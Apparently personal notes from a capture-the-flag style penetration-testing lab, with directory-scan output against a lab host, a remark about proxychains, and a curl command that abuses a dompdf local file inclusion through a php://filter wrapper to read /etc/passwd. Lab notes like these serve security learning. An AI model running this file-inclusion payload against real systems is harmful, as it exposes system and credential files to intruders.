Untitled

messsed around with proxy chains but didnt get much yet

Untitled

Untitled

Untitled

Untitled

/.hta (Status: 403) [Size: 291] /.htpasswd (Status: 403) [Size: 296] /.htaccess (Status: 403) [Size: 296] /assets (Status: 301) [Size: 313] [--> http://10.129.1.104/assets/] /images (Status: 301) [Size: 313] [--> http://10.129.1.104/images/] /index.html (Status: 200) [Size: 2877] /server-status (Status: 403) [Size: 300]

Untitled

/.htaccess (Status: 403) [Size: 296] /.htpasswd (Status: 403) [Size: 296] /assets (Status: 301) [Size: 313] [--> http://10.129.1.104/assets/] /dompdf (Status: 301) [Size: 313] [--> http://10.129.1.104/dompdf/] /images (Status: 301) [Size: 313] [--> http://10.129.1.104/images/] /server-status (Status: 403) [Size: 300]

Untitled

Untitled

Untitled

Untitled

Untitled

decode the chunk

Untitled

curl <http://10.129/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd>

iterate Local file inclusion